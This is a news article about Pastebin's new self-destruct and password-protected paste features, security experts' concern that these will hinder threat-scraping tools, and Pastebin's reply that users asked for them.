Pastebin Introduces Password Protection and Self-Destruct Features

Last week, Pastebin, the world’s most popular paste site and one of the top 2,000 websites globally according to Alexa, rolled out two new features that have sparked criticism from cybersecurity experts. The new features—Burn After Read (self-destruct) and Password Protected Pastes—have long been available on other paste sites, but until recently, Pastebin had not implemented them.

Security Concerns Over New Features

The main issue is that Pastebin has already attracted criminals and hosts a significant amount of illegal content. Stolen data is regularly uploaded to the site, and hackers use it to host malware, code, and as a repository for C&C server IP addresses, among other things. ZDNet quotes cybersecurity expert Ted Samuels, who notes that abuse on Pastebin is far from rare.

“Currently, Pastebin is the most popular paste site and a common platform for fileless attacks using PowerShell. For example, an attacker’s initial payload may use PowerShell to download additional (often obfuscated) content from pastebin.com for further execution via PowerShell. This method can even be used to load the CobaltStrike framework,” Samuels explains.

To combat this, many cybersecurity companies have developed tools that scrape new posts on Pastebin, searching for malware and sensitive data. These malicious pastes are then indexed, added to private threat databases, and brought to the attention of Pastebin’s administrators for removal.

Now, many experts are seriously concerned that Pastebin’s new features will hinder these tools, making it much harder to monitor new pastes in real time and potentially turning Pastebin into a haven for criminals.

Ongoing Tensions Between Pastebin and Security Experts

ZDNet points out that tensions between Pastebin and cybersecurity professionals have been high for some time. For example, earlier this year, Pastebin’s developers unexpectedly announced the discontinuation of their Scraping API, which experts used to detect threats as described above. After a strong negative reaction from the community, they reversed this decision. However, now that hackers can password-protect or self-destruct their pastes, the Scraping API may become almost useless for researchers, making the platform even less transparent.

Pastebin’s Response

Pastebin representatives told journalists that the new features were added in response to user requests.

“Pastebin stores important data for its users, ranging from calculations and engineering data like algorithms, logs from various services, robots, and network devices, to proprietary source code. We received many requests from users asking for these features to protect their privacy and help safeguard their work. Pastebin was created by developers for developers and is used by millions of people worldwide. Of course, every platform has bad actors who try to abuse its features, including GitHub, Twitter, Facebook, Dropbox, Privnotes, and Sendspace,” the company stated.

The developers also believe that cybersecurity experts are exaggerating the issue, noting that there are dozens of other paste sites, many of which are even more lenient about abuse. They also emphasized that they actively fight malicious content, cooperate with CERT, cybersecurity companies, and law enforcement agencies worldwide, and provide free access for researchers and academics.

Calls for Blocking Pastebin in Corporate Networks

Cybersecurity experts, for their part, have long argued that Pastebin and similar sites should be blocked on corporate networks. Since it is well known that these platforms are abused by malicious actors, they believe organizations should treat such resources accordingly.